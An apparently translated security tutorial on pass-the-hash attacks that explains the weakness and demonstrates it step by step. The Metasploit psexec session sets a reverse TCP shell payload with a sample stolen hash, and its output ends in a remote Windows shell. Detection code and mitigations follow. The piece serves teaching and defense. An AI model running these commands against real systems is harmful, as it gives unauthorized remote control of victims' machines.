Analysis and defense of pass-the-hash intrusion techniques


Source: Hack01@Live.cn


Preface
~~~~~~
Protecting passwords from being obtained maliciously, and the complex password policies that go with it, are a common topic for security personnel. In this article I will not describe how to crack a system password from its hash and stored credential information. Instead, the article focuses on demonstrating how an attacker penetrates a target system using nothing but a stolen password hash, and then on how to detect and prevent this kind of intrusion.


Hash at the packet level
~~~~~~~~~~~~~~~~~~~~
Each time a Windows account is created, its password is converted into a password hash. A hash function is a one-way mathematical function that accepts input of any size and returns a fixed-size string. When you try to access a host protected by user name and password verification, the computer computes the hash of the password you entered and submits it to the host, which compares it with the value stored in its account database; if they match, you are authenticated.

Now consider the alternative. Suppose we establish a connection to the host manually, but instead of the correct user name and password we present the stolen hash of an administrator's user name and password. What we want is administrative access to the host. Remember that all the host cares about is receiving a hash value that matches. This means you never need to run the one-way hash function over a password; you only need to supply the hash, and that is the basis of this intrusion.
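To make this concrete, here is an added toy simulation (not from the original article) of a challenge-response login on a host that stores only hashes: a client holding just the stolen hash produces exactly the same valid response as a client holding the password. SHA-256 stands in for the real NT hash (MD4 over the UTF-16LE password) and the HMAC response is a simplification, not the NTLM wire protocol.

```python
import hashlib
import hmac
import secrets

# Stand-in for the NT hash. The real NT hash is MD4 over the UTF-16LE
# password; SHA-256 is used here only so the example runs anywhere.
def password_hash(password: str) -> bytes:
    return hashlib.sha256(password.encode("utf-16-le")).digest()

def compute_response(pw_hash: bytes, challenge: bytes) -> bytes:
    # The response is keyed by the hash, never by the cleartext password,
    # so whoever holds the hash can produce it.
    return hmac.new(pw_hash, challenge, hashlib.sha256).digest()

class Host:
    """Host that stores password hashes only (like the SAM database)."""
    def __init__(self):
        self.accounts = {}

    def add_account(self, user: str, password: str) -> None:
        self.accounts[user] = password_hash(password)

    def new_challenge(self) -> bytes:
        return secrets.token_bytes(8)

    def verify(self, user: str, challenge: bytes, response: bytes) -> bool:
        stored = self.accounts.get(user)
        if stored is None:
            return False
        expected = compute_response(stored, challenge)
        return hmac.compare_digest(expected, response)

def login_with_password(host: Host, user: str, password: str) -> bool:
    """Normal client: derives the hash from the password, then responds."""
    challenge = host.new_challenge()
    response = compute_response(password_hash(password), challenge)
    return host.verify(user, challenge, response)

def login_with_hash(host: Host, user: str, stolen_hash: bytes) -> bool:
    """Client that has only the hash: the password is never needed."""
    challenge = host.new_challenge()
    response = compute_response(stolen_hash, challenge)
    return host.verify(user, challenge, response)
```

The host cannot tell the two clients apart, which is why the defenses later in the article focus on limiting where a hash is accepted and on detecting what happens after the logon.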


Use Metasploit to pass the hash
~~~~~~~~~~~~~~~~~~~~~~~
To perform this task, we will use a victim machine whose administrator hash we have already stolen. Two things are needed for this attack. First, the hash of the administrator account; underground groups currently use many different methods to obtain password hashes, and those methods are not covered here. Second, Metasploit, which we will use to carry out the intrusion.

Metasploit is a free penetration testing framework created by HD Moore. Here we use the BackTrack 4 (BT4) Linux live distribution, available from http://www.backtrack-linux.org/?lang=zh, in which Metasploit is installed in the /pentest/exploits/framework3 directory.

With the stolen hash and Metasploit at hand, we can begin. Open a terminal, change to the /pentest/exploits/framework3 directory, and type "./msfconsole" to start the Metasploit console.

root@czy:~# cd /pentest/exploits/framework3/
root@czy:/pentest/exploits/framework3# ./msfconsole
msf >

Metasploit is a framework; the actual work is done by the modules it loads. In this case we will use the psexec module. Psexec is a well-known tool (not specific to Metasploit) for executing processes on a remote system and redirecting their output streams. To use this module, type "use windows/smb/psexec" and press Enter. The shell prompt then changes to show that the module is in use.

msf > use windows/smb/psexec
msf exploit(psexec) >

Next we must set the payload. Once the account and hash have authenticated us, psexec executes the payload for us. In a case like this an intruder usually has many things in mind rather than one specific published action, so what we want is a command shell from which a long series of tedious, repetitive commands can be run. One of the more effective choices is a reverse TCP shell. To use this payload, type "set payload windows/shell_reverse_tcp".

msf exploit(psexec) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(psexec) >

To use this module and payload, we have to configure a few options. To see them, type "show options" and press Enter.

msf exploit(psexec) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPass                   no        The password for the specified username
   SMBUser  Administrator    yes       The username to authenticate


Payload options (windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) >

To configure an option, use the syntax "set [option name] [value]". The values to set are:

· RHOST - IP address of the victim
· SMBPass - the victim's stolen hash
· SMBUser - user name of the victim
· LHOST - IP address of the machine you are attacking from

In most cases only these four options need to be configured; the others can keep their default values.

msf exploit(psexec) > show options

Module options:

   Name     Current Setting                                                    Required  Description
   ----     ---------------                                                    --------  -----------
   RHOST    192.168.0.20                                                       yes       The target address
   RPORT    445                                                                yes       Set the SMB service port
   SMBPass  e52cac67419a9a224a3b424f3fa6cb6d:8846F7EAEE8FB117AD06BDD830B7586C  no        The password for the specified username
   SMBUser  Administrator                                                      yes       The username to authenticate


Payload options (windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.0.128    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) >

At this point all preparation is complete and we can run the attack. To do so, simply type "exploit" and press Enter. If it succeeds, you will see output like the following, ending in a working Windows command shell. At no point did we need the administrator's password to gain control.

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.0.128:4444
[*] Connecting to the server...
[*] Authenticating as user admin...
[*] Uploading payload...
[*] Created ibpwnoK.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.20[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.20[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (tlfgTpTb - "MBrTRKuKR")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting ibpwnoK.exe...
[*] Command shell session 1 opened (192.168.0.128:4444 -> 192.168.0.20:1063) at Sun Jul 25 11:20:59 -0400 2010


(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


Defending against pass-the-hash
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By its nature, passing a hash during authentication is hard to detect and prevent, but there are several things you can do:

· Intrusion detection system monitoring - an IDS cannot recognise a pass-the-hash attack by signature, because on the network it looks like a normal authentication sequence. What you may be able to detect is what the attacker does after access has been obtained. In our example you may not see an alert for the hash being passed to the victim machine, but you may see a warning that psexec created a shell. When such information is detected, respond appropriately to determine what happened.
· Isolate sensitive systems - every machine that holds sensitive data should be isolated. Restrict access with appropriate router and firewall configuration so that only trusted hosts can reach the service. This prevents attempts from other machines to reach a sensitive system's user accounts with the pass-the-hash technique.
· Two-factor authentication - password-based authentication is the traditional method. In addition to the password, consider other factors such as smart cards and biometric identification. Combining two factors blocks anyone who holds only a password or a stolen hash.
· Restrict administrative access - the more accounts with administrative rights there are, the higher the probability that one of their hashes is stolen and the network compromised. Audit regularly to determine whether each user really needs administrator rights.
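The pattern visible in the Metasploit session above (a network NTLM logon, then a randomly named service whose binary is uploaded, started and deleted) can be correlated from Windows event logs. The following added Python example, which is not part of the original article, runs that correlation over constructed sample events using Windows event IDs 4624 (logon) and 7045 (service installed); the line format, host names and service allowlist are assumptions made for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events modelled on the session in this article:
# a type 3 (network) NTLM logon followed by a randomly named service and
# binary. Simplified format: time|host|event_id|key=value fields.
SAMPLE_LOG = """\
2010-07-25T09:00:00|victim|7045|service=Spooler image=C:\\WINDOWS\\system32\\spoolsv.exe
2010-07-25T11:20:55|victim|4624|user=Administrator type=3 package=NTLM src=192.168.0.128
2010-07-25T11:20:57|victim|7045|service=tlfgTpTb image=C:\\WINDOWS\\ibpwnoK.exe
2010-07-25T11:25:00|victim|4624|user=backup type=3 package=Kerberos src=192.168.0.5
2010-07-25T11:25:03|victim|7045|service=BackupAgent image=C:\\Backup\\agent.exe
"""

KNOWN_SERVICES = {"Spooler", "BackupAgent"}   # constructed allowlist
WINDOW = timedelta(seconds=60)                # logon-to-service window (assumed)
FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse(line: str) -> dict:
    """Split one simplified log line into a dict of its fields."""
    time_s, host, event_id, detail = line.split("|", 3)
    fields = dict(FIELD_RE.findall(detail))
    return {"time": datetime.fromisoformat(time_s), "host": host,
            "event_id": int(event_id), **fields}

def detect_pass_the_hash_psexec(log_text: str) -> list:
    """Alert when an NTLM network logon is followed within WINDOW by the
    installation of a service not on the allowlist on the same host."""
    events = [parse(l) for l in log_text.splitlines() if l.strip()]
    ntlm_logons = []   # 4624 events with type 3 and package NTLM
    alerts = []
    for ev in events:
        if (ev["event_id"] == 4624 and ev.get("type") == "3"
                and ev.get("package") == "NTLM"):
            ntlm_logons.append(ev)
        elif ev["event_id"] == 7045 and ev["service"] not in KNOWN_SERVICES:
            for lg in ntlm_logons:
                delta = ev["time"] - lg["time"]
                if lg["host"] == ev["host"] and timedelta(0) <= delta <= WINDOW:
                    alerts.append({"host": ev["host"], "src": lg["src"],
                                   "user": lg["user"], "service": ev["service"],
                                   "image": ev["image"]})
    return alerts

if __name__ == "__main__":
    for alert in detect_pass_the_hash_psexec(SAMPLE_LOG):
        print("suspicious service after NTLM logon:", alert)
```

The Kerberos logon and the allowlisted service in the sample produce no alert; only the unknown service installed two seconds after the NTLM network logon is reported, together with the source address of that logon.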


Conclusion
~~~~~
Intrusion by passing a hash is easy to carry out and devastating for the victim machine. As this article has shown, with the right operation and motivation an attacker can completely paralyse the target infrastructure. I hope this gives a strategic understanding of the intrusion, its detection and its prevention. If you still have questions about the details, please write to my e-mail (Hack01 [at] Live.cn).
